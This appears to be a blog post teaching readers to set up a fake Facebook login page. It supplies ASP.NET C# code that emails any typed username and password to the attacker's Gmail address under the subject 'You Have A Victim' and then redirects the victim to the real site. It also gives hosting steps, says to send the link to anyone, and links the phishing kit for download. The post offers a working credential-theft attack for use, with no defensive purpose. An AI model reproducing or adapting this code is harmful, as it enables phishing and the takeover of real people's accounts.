what you have to do only change your email ids and passwords in the code and upload it to somee.com and you have done..
STEP 1
go to Somee.com and register for free account.
They give you ftp account with details
STEP 2
Open the zip file which You download from the Bottom Of the Post.
and open default.aspx.cs in Notepad and change the following code
protected void Button1_Click(object sender, EventArgs e)
{
// By Ezioobj_EMails.sendemail(“igeteverything@gmail.com”, “You Have A Victim”, “From :” + TextBox1.Text + ”
Password : ” + TextBox2.Text);
Response.Redirect(“http://www.facebook.com/login.php”);
}
in place of igeteverything@gmail.com use your gmail address where password is transfered.
STEP 3
Now open Emailer.cs File in note pad available in zip
public class Emailer
{
SmtpClient client = new SmtpClient();
System.Net.Mail.MailMessage msg = new System.Net.Mail.MailMessage();System.Net.NetworkCredential credentials = new System.Net.NetworkCredential(“igeteverything@gmail.com”, “mypassword”);
public void sendemail(string sendto, string subject, string body)
{
try
{
client.Host = “smtp.gmail.com”;
// client.Host = “smtpout.secureserver.net”;
client.Port = 587;
client.UseDefaultCredentials = false;
client.Credentials = credentials;
client.EnableSsl = false;
// convert strings to mail addressMailAddress to = new MailAddress(sendto);
MailAddress from = new MailAddress(“igeteverything@gmail.com”);//
msg.IsBodyHtml = true;
msg.Subject = subject;
msg.Body = body;
msg.To.Add(to);
msg.From = from;client.Send(msg);
}
catch (Exception ex)
{
ex.ToString();
}
}
}
Find “igeteverything@gmail.com” replace with your email from both place, and ”mypassword” with your gmail password
NOTE: I suggest you to create a New Gmail account to use this hack.
STEP 4
download filezilla to upload your site.
STEP 5
Now send URL to anyone.
Download Site
fakebooklogin.rar
Download













Blog RSS Feed
Subscribe via E-mail
Follow Me on Twitter
1:42 am
gonna try it soon!